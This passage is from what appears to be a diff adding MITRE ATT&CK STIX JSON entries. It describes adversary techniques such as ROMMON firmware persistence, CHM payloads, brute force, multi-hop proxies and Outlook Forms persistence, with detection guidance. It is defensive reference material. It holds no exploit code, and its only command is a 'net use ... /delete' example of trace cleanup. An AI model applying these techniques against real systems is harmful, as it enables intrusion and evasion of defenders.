follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "SaaS", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "created": "2020-03-02T18:45:07.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1566", + "external_id": "T1566" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "CISA Remote Monitoring and Management Software", + "description": "CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a" + }, + { + "source_name": "cyberproof-double-bounce", + "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.", + "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends" + }, + { + "source_name": "Unit42 Luna Moth", + "description": "Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.", + "url": "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "Microsoft OAuth Spam 2022", + "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/" + }, + { + "source_name": "sygnia Luna Month", + "description": "Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.", + "url": "https://blog.sygnia.co/luna-moth-false-subscription-scams" + }, + { + "source_name": "Proofpoint-spoof", + "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.", + "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing" + }, + { + "source_name": "Palo Alto Unit 42 VBA Infostealer 2014", + "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.", + "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Graphical User Interface", + "description": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**\n\nThe Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. \n\nUnknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a6525aec-acc4-47fe-92f9-b9b4de4b9228", + "created": "2017-05-31T21:30:50.342Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1061", + "external_id": "T1061" + }, + { + "source_name": "Wikipedia Run Command", + "description": "Wikipedia. (2018, August 3). Run Command. Retrieved October 12, 2018.", + "url": "https://en.wikipedia.org/wiki/Run_command" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "ROMMONkit", + "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "created": "2020-10-20T00:05:48.790Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/004", + "external_id": "T1542.004" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-18T16:31:56.936Z", + "name": "Compiled HTML File", + "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "created": "2020-01-23T18:53:54.377Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/001", + "external_id": "T1218.001" + }, + { + "source_name": "Microsoft CVE-2017-8625 Aug 2017", + "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.", + "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625" + }, + { + "source_name": "Microsoft HTML Help May 2018", + "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk" + }, + { + "source_name": "Microsoft HTML Help Executable Program", + "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.", + "url": "https://msdn.microsoft.com/windows/desktop/ms524405" + }, + { + "source_name": "Microsoft HTML Help ActiveX", + "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.", + "url": "https://msdn.microsoft.com/windows/desktop/ms644670" + }, + { + "source_name": "MsitPros CHM Aug 2017", + "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.", + "url": "https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Network Share Connection Removal", + "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_system_requirements": [ + "Established network share connection to a remote system. Level of access depends on permissions of the account used." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "created": "2020-01-31T12:39:18.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/005", + "external_id": "T1070.005" + }, + { + "source_name": "Technet Net Use", + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "url": "https://technet.microsoft.com/bb490717.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T13:24:36.872Z", + "name": "Multi-hop Proxy", + "description": "Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.\n\nFor example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)\n\nIn the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.\n\nSimilarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Eduardo Chavarro Ovalle" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "created": "2020-03-14T23:23:41.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/003", + "external_id": "T1090.003" + }, + { + "source_name": "NGLite Trojan", + "description": "Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.", + "url": "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" + }, + { + "source_name": "Onion Routing", + "description": "Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.", + "url": "https://en.wikipedia.org/wiki/Onion_routing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:08.613Z", + "name": "Loss of Control", + "description": "Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0827", + "external_id": "T0827" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Change Program State", + "description": "Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a8cfd474-9358-464f-a169-9c6f099a8e8a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0875", + "external_id": "T0875" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-29T18:53:26.593Z", + "name": "Brute Force", + "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Fiser, @anu4is, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Magno Logan, @magnologan, Trend Micro", + "Yossi Weizman, Azure Defender Research Team", + "Ed Williams, Trustwave, SpiderLabs", + "Mohamed Kmal" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "created": "2017-05-31T21:31:22.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110", + "external_id": "T1110" + }, + { + "source_name": "TrendMicro Pawn Storm Dec 2020", + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:24:40.163Z", + "name": "Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "created": "2020-03-09T14:15:05.330Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/004", + "external_id": "T1059.004" + }, + { + "source_name": "Apple ZShell", + "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.", + "url": "https://support.apple.com/HT208050" + }, + { + "source_name": "DieNet Bash", + "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.", + "url": "https://linux.die.net/man/1/bash" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Outlook Forms", + "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "created": "2019-11-07T20:06:02.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/003", + "external_id": "T1137.003" + }, + { + "source_name": "SensePost Outlook Forms", + "description": "Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.", + "url": "https://sensepost.com/blog/2017/outlook-forms-and-shells/" + }, + { + 